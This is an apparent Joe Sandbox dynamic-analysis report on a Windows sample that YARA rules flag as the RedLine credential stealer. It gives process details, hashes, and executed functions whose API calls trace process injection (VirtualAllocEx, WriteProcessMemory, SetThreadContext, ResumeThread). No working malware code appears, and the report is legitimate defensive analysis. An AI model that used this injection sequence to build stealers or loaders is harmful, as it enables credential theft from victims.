Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:07:01
Start date:	16/11/2024
Path:	C:\Users\user\Desktop\9dOKGgFNL2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9dOKGgFNL2.exe"
Imagebase:	0xb30000
File size:	534'528 bytes
MD5 hash:	020EC1DF3B8B9D28DA16EDAF0D50A262
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:07:01
Start date:	16/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.3%
Total number of Nodes:	256
Total number of Limit Nodes:	12

Executed Functions

Function 065911FC Relevance: 6.9, Strings: 5, Instructions: 626
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hjq, xrefs: 06593D2D
Hjq, xrefs: 06593DEB
Hjq, xrefs: 06593CA3
Hjq, xrefs: 06593C1C
Hjq, xrefs: 06593B89

Memory Dump Source

Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID: Hjq$Hjq$Hjq$Hjq$Hjq
API String ID: 0-1529018591
Opcode ID: 1d13293fa013a6f87feae6710da2e2554742aa1e3a68799e0d42bb6db47e787e
Instruction ID: 7fcce9063920cc1549d68fd94361b02d4171f57e292bca1567f31e4743df4cf9
Opcode Fuzzy Hash: 1d13293fa013a6f87feae6710da2e2554742aa1e3a68799e0d42bb6db47e787e
Instruction Fuzzy Hash: 2A324C70E00259CFDF98DFA9C85479EBBB2BF84300F148569D409AB385DB349D85CBA5

Function 065994F0 Relevance: 5.6, Strings: 4, Instructions: 562
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pjq, xrefs: 06599975
4'fq, xrefs: 065998AC
~, xrefs: 0659970E
:, xrefs: 0659976F

Memory Dump Source

Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID: 4'fq$:$pjq$~
API String ID: 0-2740937384
Opcode ID: a2ba4c41d2bae1e4eccae7f7cb39148080e335b94000e887a0fa5e96dda7c13a
Instruction ID: a370e99187236669caa6845642d9db942b2becefcd19a60fb19b82c6fe653162
Opcode Fuzzy Hash: a2ba4c41d2bae1e4eccae7f7cb39148080e335b94000e887a0fa5e96dda7c13a
Instruction Fuzzy Hash: EA42EF75A00218DFDB65CFA9C980B99BBB2FF49300F1580E9E509AB261DB31AD91DF50

Function 07D79708 Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f62430113f2cb7ec2c03412e3af338ec4521df560a5da9b328cef0ef984db084
Instruction ID: 5fc7b856cf7b0add18a10ce6522497e05dd71a3ccf6b68aa658065fa31692b17
Opcode Fuzzy Hash: f62430113f2cb7ec2c03412e3af338ec4521df560a5da9b328cef0ef984db084
Instruction Fuzzy Hash: ECE1BCB2B017058FDB29DB79C460BAEB7F6EF89304F14446DD1899B290EB35E901CB51

Function 065935BA Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e0eeedcd64d6be454c6171312abb892e1b3f4e9e55cfc7a3bf432cf1cb3cb5
Instruction ID: bd4caa0c0f1b67061a5668e222da1fd57adba81090ed662fac7f7227dea5a81a
Opcode Fuzzy Hash: 93e0eeedcd64d6be454c6171312abb892e1b3f4e9e55cfc7a3bf432cf1cb3cb5
Instruction Fuzzy Hash: 03C15A70E00659DFCF64DFA5C880799BBB2BF88300F04C5AAD419AB255EB309985CFA0

Function 031F6F90 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53931f960b198d3d1b492c607a461ed96cf198009833c66687086060fd65b816
Instruction ID: 1b10fc20ec627931290837285a9183dd16b85c2df0d13dad79d935fd3e372e6d
Opcode Fuzzy Hash: 53931f960b198d3d1b492c607a461ed96cf198009833c66687086060fd65b816
Instruction Fuzzy Hash: C3518174E012098FCB08DFA9D8949EEBBF6FF88310F14816AD519AB364DB359945CF90

Function 031F3E28 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53bbbaa5fc259ca872ed7d96904572619b0d9c21c32fb9469f7ad7996a2fee70
Instruction ID: a6224f74a50b600d5ac6ffbaf47fffb29fcf9afbcdce5e03fbbeef157d84dbd8
Opcode Fuzzy Hash: 53bbbaa5fc259ca872ed7d96904572619b0d9c21c32fb9469f7ad7996a2fee70
Instruction Fuzzy Hash: 86518274E012099FCB08DFA9D8949EEBBF6FF88310F14852AD519AB364DB319945CF90

Function 031FD550 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 031FD5DE
GetCurrentThread.KERNEL32 ref: 031FD61B
GetCurrentProcess.KERNEL32 ref: 031FD658
GetCurrentThreadId.KERNEL32 ref: 031FD6B1

Strings

^gd, xrefs: 031FD57C

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID: Current$ProcessThread
String ID: ^gd
API String ID: 2063062207-4160683662
Opcode ID: 3522914e4b79f33fa9b7db59719c2f6ce3138b0b32a3ea96b5d58401c8ef63ed
Instruction ID: faf4a266e404e5eda735cc960f113ef9e28c5b88a79597e277d94e191f56741d
Opcode Fuzzy Hash: 3522914e4b79f33fa9b7db59719c2f6ce3138b0b32a3ea96b5d58401c8ef63ed
Instruction Fuzzy Hash: 265178B0900349CFDB14DFA9D588BAEBFF5AF88314F24845AE018A7360DB355944CB66

Function 031FD560 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 031FD5DE
GetCurrentThread.KERNEL32 ref: 031FD61B
GetCurrentProcess.KERNEL32 ref: 031FD658
GetCurrentThreadId.KERNEL32 ref: 031FD6B1

Strings

^gd, xrefs: 031FD57C

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID: Current$ProcessThread
String ID: ^gd
API String ID: 2063062207-4160683662
Opcode ID: 4834347fe4a152afa81b69df509862d7dd554f3cabfebb3fdfc2fee3ae431a8f
Instruction ID: 3114e0ecd267a8c2c7816f62d22d3257fc6b21308ab5311b39e4c3ba37b16a8d
Opcode Fuzzy Hash: 4834347fe4a152afa81b69df509862d7dd554f3cabfebb3fdfc2fee3ae431a8f
Instruction Fuzzy Hash: 4E5167B0900249CFDB14DFA9D688BAEBBF5EF88314F24845AE018A7360DB355944CB65

Function 07D761FC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 250
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D7643E

Strings

^gd, xrefs: 07D76272
^gd, xrefs: 07D76243

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: CreateProcess
String ID: ^gd$^gd
API String ID: 963392458-4222006328
Opcode ID: 2145b9d6097f1d79b4c7f18840bf0d02319e0a5339b7a07c5b3e2352e85c4e59
Instruction ID: d226e0d3792e8f8cb806bf63e048e17ab30b385beb7c5769f2f9024c44b73e1d
Opcode Fuzzy Hash: 2145b9d6097f1d79b4c7f18840bf0d02319e0a5339b7a07c5b3e2352e85c4e59
Instruction Fuzzy Hash: D2A15CB1D0061ADFDB24CFA8C941BDEFBB2BF48314F148569D808A7244EB759985CF92

Function 07D76208 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D7643E

Strings

^gd, xrefs: 07D76272
^gd, xrefs: 07D76243

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: CreateProcess
String ID: ^gd$^gd
API String ID: 963392458-4222006328
Opcode ID: 4f079cd18b2456603ed2263f5a730c69424113c1e10aa449d6ac40f40c6df84a
Instruction ID: 5acd492c089d230a6ddbf6e181d6356788059093e24aa370bbf88dc6c3f06e79
Opcode Fuzzy Hash: 4f079cd18b2456603ed2263f5a730c69424113c1e10aa449d6ac40f40c6df84a
Instruction Fuzzy Hash: 5E914BB1D0061ADFDB24CFA8C941BDEFBB2BF48314F148569D808A7284EB759985CF91

Function 031FAEB8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 031FB11E

Strings

^gd, xrefs: 031FB0D7

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID: HandleModule
String ID: ^gd
API String ID: 4139908857-4160683662
Opcode ID: bf44478f2cdde8612847a478e7347b50d3f04b2a6c8f144792119a861b13f556
Instruction ID: b3235197886e77f58409edbe4fd8f4cbbb7b2704d606f7defe0377df0abf2a89
Opcode Fuzzy Hash: bf44478f2cdde8612847a478e7347b50d3f04b2a6c8f144792119a861b13f556
Instruction Fuzzy Hash: 729166B0A00B458FD725DF29D48475ABBF5FF88304F04896EE18ACBA41D739E855CB91

Function 031F590C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031F59C9

Strings

^gd, xrefs: 031F594C

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID: Create
String ID: ^gd
API String ID: 2289755597-4160683662
Opcode ID: 39862fa18391ed9aeb04e4f5835402a7314ae575cb4339a5fc7e309d877b19a7
Instruction ID: 6d560bec2c4a19dc8ad5837ff66074979d6fb6fbee8d62dbd116376f1b7a432e
Opcode Fuzzy Hash: 39862fa18391ed9aeb04e4f5835402a7314ae575cb4339a5fc7e309d877b19a7
Instruction Fuzzy Hash: 4241E2B0C00619CFDF25CFA9C985B8DBBB2BF49304F24815AD418AB255DB756945CF90

Function 031F44B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031F59C9

Strings

^gd, xrefs: 031F594C

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID: Create
String ID: ^gd
API String ID: 2289755597-4160683662
Opcode ID: 541e489a66bec57c9c20f69c57fa8ea98c3f5253396363a8c3cc072a4e242951
Instruction ID: c7c6dd3451e130100b7e7fb8a5a1ce5b89f9cf81a291811d9e994293e3326d0a
Opcode Fuzzy Hash: 541e489a66bec57c9c20f69c57fa8ea98c3f5253396363a8c3cc072a4e242951
Instruction Fuzzy Hash: 7841EDB0C0061DCFDB24CFA9C985B8EBBB6BF49314F20816AD418AB255DB756945CF90

Function 06593EF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^gd, xrefs: 06593F5A

Memory Dump Source

Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd

Similarity

API ID: CreateFromIconResource
String ID: ^gd
API String ID: 3668623891-4160683662
Opcode ID: 812b381d3beea6f4acf94cf647f4ea7580fcc95b4a171ead4f9ab25e193be0b1
Instruction ID: a1bfd37ada2df21d7e9bf43a8f3b07431b20365e679dddb21275cba960dfa4ad
Opcode Fuzzy Hash: 812b381d3beea6f4acf94cf647f4ea7580fcc95b4a171ead4f9ab25e193be0b1
Instruction Fuzzy Hash: 90318B718052899FCF11CFA9D804AEABFF8EF49310F14805AF914A7251C3359850DFB1

Function 06592738 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 065927D7

Strings

^gd, xrefs: 06592765

Memory Dump Source

Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd

Similarity

API ID: DrawText
String ID: ^gd
API String ID: 2175133113-4160683662
Opcode ID: 75232f7c3e16ef0f1f63cc1f869681efab38f0b711254d1c3507d2406e6b3644
Instruction ID: 172b89af59a21bc8489ac09695cf8431808bb6d5119e64ad21af1b9c2ba8a2e5
Opcode Fuzzy Hash: 75232f7c3e16ef0f1f63cc1f869681efab38f0b711254d1c3507d2406e6b3644
Instruction Fuzzy Hash: 7F31D1B5D01249AFDB10CF9AD880ADEBFF9BB48320F14842AE819A7210D775A544CFA0

Function 07D75F78 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D76010

Strings

^gd, xrefs: 07D75F9F

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: ^gd
API String ID: 3559483778-4160683662
Opcode ID: 1fd55aafb8bb999c7be42b8f01465a27526599272cb6ea31c6f4f6d05c70e956
Instruction ID: 083aff7f3231cb41f73ee772312d807accd9e3a0eb0cd3946bc8c92abbdadbd4
Opcode Fuzzy Hash: 1fd55aafb8bb999c7be42b8f01465a27526599272cb6ea31c6f4f6d05c70e956
Instruction Fuzzy Hash: BA212AB5900349DFCB10CFA9C881BDEBBF5FF48324F10842AE919A7240D7799950DBA5

Function 07D75DE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D75E66

Strings

^gd, xrefs: 07D75E04

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: ContextThreadWow64
String ID: ^gd
API String ID: 983334009-4160683662
Opcode ID: 05c8846f79630742038da1f77ca7e7194b0458023176f86ad70914db23321e41
Instruction ID: a41d01dbb950bb1a51e86481dfd723bd9bcb080ded8b51b19676ed6d3cbfd9d3
Opcode Fuzzy Hash: 05c8846f79630742038da1f77ca7e7194b0458023176f86ad70914db23321e41
Instruction Fuzzy Hash: C42139B1D003099FDB10DFAAD4857EEFBF4EF48324F14842AD519A7240D7799945CBA1

Function 07D76069 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D760F0

Strings

^gd, xrefs: 07D7608F

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: MemoryProcessRead
String ID: ^gd
API String ID: 1726664587-4160683662
Opcode ID: 7964bb3c6b16f814346f1d2ed9a20f4400c5d24939d1969e869f9df4e9ba7aaf
Instruction ID: 97acf5dd2649dc98f858b7b357ca75834c82e81fd7eb9619b498c3b68db263fe
Opcode Fuzzy Hash: 7964bb3c6b16f814346f1d2ed9a20f4400c5d24939d1969e869f9df4e9ba7aaf
Instruction Fuzzy Hash: 4A2119B59013599FCB10DFAAD881BEEFBF5FF48320F10842AE919A7240D7759540DBA1

Function 06592740 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 065927D7

Strings

^gd, xrefs: 06592765

Memory Dump Source

Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd

Similarity

API ID: DrawText
String ID: ^gd
API String ID: 2175133113-4160683662
Opcode ID: f21110012edbdc47b3dd86b66f36d71e1450ec0654c2c06440ca3fac35f4f20e
Instruction ID: 96928b5321cd479a86ba3f0618a14956db909bd85e229d781e3e75ebda9de640
Opcode Fuzzy Hash: f21110012edbdc47b3dd86b66f36d71e1450ec0654c2c06440ca3fac35f4f20e
Instruction Fuzzy Hash: 2621C3B5D002099FDB10CF9AD880A9EFBF5FF58320F14842AE819A7210D775A544CFA0

Function 07D75F80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D76010

Strings

^gd, xrefs: 07D75F9F

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: ^gd
API String ID: 3559483778-4160683662
Opcode ID: ceab32c7fa1732af4c41e1cafc86969152d1bdb8ef50b3ce64160ad19487f174
Instruction ID: 3ffbacba3a8ca87af45bc89baeaa8224adce483249ae46cb00ffccae928e30de
Opcode Fuzzy Hash: ceab32c7fa1732af4c41e1cafc86969152d1bdb8ef50b3ce64160ad19487f174
Instruction Fuzzy Hash: 222125B5900309DFCB10CFAAC881BDEBBF5FF48320F10842AE919A7240D7799950DBA1

Function 031FD7A1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031FD82F

Strings

^gd, xrefs: 031FD7C7

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID: DuplicateHandle
String ID: ^gd
API String ID: 3793708945-4160683662
Opcode ID: f9df60e890d8e68684b5b8e2654b408a61f63b24c43a0c974f2d9c01b566b4f7
Instruction ID: 2d44d913b27a978f95d00a4b98d292218b6aa1c8e7ef0f70a8266755d8ac9217
Opcode Fuzzy Hash: f9df60e890d8e68684b5b8e2654b408a61f63b24c43a0c974f2d9c01b566b4f7
Instruction Fuzzy Hash: 8B21D4B59002099FDB10CF9AD585ADEBBF4EB48310F14845AE918A7310D374A950CFA1

Function 07D75DE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D75E66

Strings

^gd, xrefs: 07D75E04

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: ContextThreadWow64
String ID: ^gd
API String ID: 983334009-4160683662
Opcode ID: b970eada01b00b424ef6c46492516a9c90e7451ee5df5deaed734cd9344af92c
Instruction ID: 26327090beb3ee4194e3402498b40f4c1237f2b0a96605c4cdb6a712ac465ae0
Opcode Fuzzy Hash: b970eada01b00b424ef6c46492516a9c90e7451ee5df5deaed734cd9344af92c
Instruction Fuzzy Hash: CF2118B1D003098FDB10DFAAC4857AEFBF4EF48324F14842AD519A7240D7789944CFA1

Function 07D76070 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D760F0

Strings

^gd, xrefs: 07D7608F

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: MemoryProcessRead
String ID: ^gd
API String ID: 1726664587-4160683662
Opcode ID: a917416a5d08bb1e6ba7014d0cac74a1f5c678a4be2d604a022329e8ba826988
Instruction ID: 2c9bbcf3e71e3b6af7dc3010d4864e538a5bc1d23058585ee9ba49da4d90e2f3
Opcode Fuzzy Hash: a917416a5d08bb1e6ba7014d0cac74a1f5c678a4be2d604a022329e8ba826988
Instruction Fuzzy Hash: 822116B19002599FCB10CFAAC881ADEFBF5FF48320F10842AE919A7240D7799500DBA1

Function 031FD7A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031FD82F

Strings

^gd, xrefs: 031FD7C7

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID: DuplicateHandle
String ID: ^gd
API String ID: 3793708945-4160683662
Opcode ID: d8d1fbefcebcf4524671c8cbf732626032e436a22f61c184ede3fd4c0a14e7ad
Instruction ID: e921543fa399d280b1347aec10b7b6784010cdbd75c08c1f63ea21d9fea78a73
Opcode Fuzzy Hash: d8d1fbefcebcf4524671c8cbf732626032e436a22f61c184ede3fd4c0a14e7ad
Instruction Fuzzy Hash: 8F21E3B59002089FDB10CFAAD984ADEBBF8EB48320F14801AE918A3310D374A940CFA1

Function 07D75EB8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D75F2E

Strings

^gd, xrefs: 07D75ED7

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: AllocVirtual
String ID: ^gd
API String ID: 4275171209-4160683662
Opcode ID: f2d6aed457a3e8edb56837efaf9227736e18077e821d373960e1453635a1a399
Instruction ID: 2a191b6ec6c5415aa81a70899e73f8d4fa64857baa969ecff26317773e14a6c4
Opcode Fuzzy Hash: f2d6aed457a3e8edb56837efaf9227736e18077e821d373960e1453635a1a399
Instruction Fuzzy Hash: 00118CB68002499FCB20DFAAD845BEFFFF9EF48324F20841AE519A7250C7759500DBA1

Function 06591244 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06593F0A,?,?,?,?,?), ref: 06593FAF

Strings

^gd, xrefs: 06593F5A

Memory Dump Source

Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd

Similarity

API ID: CreateFromIconResource
String ID: ^gd
API String ID: 3668623891-4160683662
Opcode ID: 4e83e2d8d324eac72534b660be68974276caa7d68ef68dce8876e41e4c97a422
Instruction ID: 65fd355886977ab21e1cc5fa564ca8c1e05f470326a1bc17f55874de583343c0
Opcode Fuzzy Hash: 4e83e2d8d324eac72534b660be68974276caa7d68ef68dce8876e41e4c97a422
Instruction Fuzzy Hash: 9F1129B5800249DFDB10CF9AC845BDEBFF8EB48324F14845AE954A7210C379A954DFA5

Function 07D758F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07D75962

Strings

^gd, xrefs: 07D75917

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: ResumeThread
String ID: ^gd
API String ID: 947044025-4160683662
Opcode ID: d6208b259a31b01c47fa869dcf5409a6e0c2e76b6cd33708c8cce75073f4c242
Instruction ID: 3161bc4b20dbb36c3ac6f5e7314f9a6546d32f3ec2e6d46eea92d64ceb290a7a
Opcode Fuzzy Hash: d6208b259a31b01c47fa869dcf5409a6e0c2e76b6cd33708c8cce75073f4c242
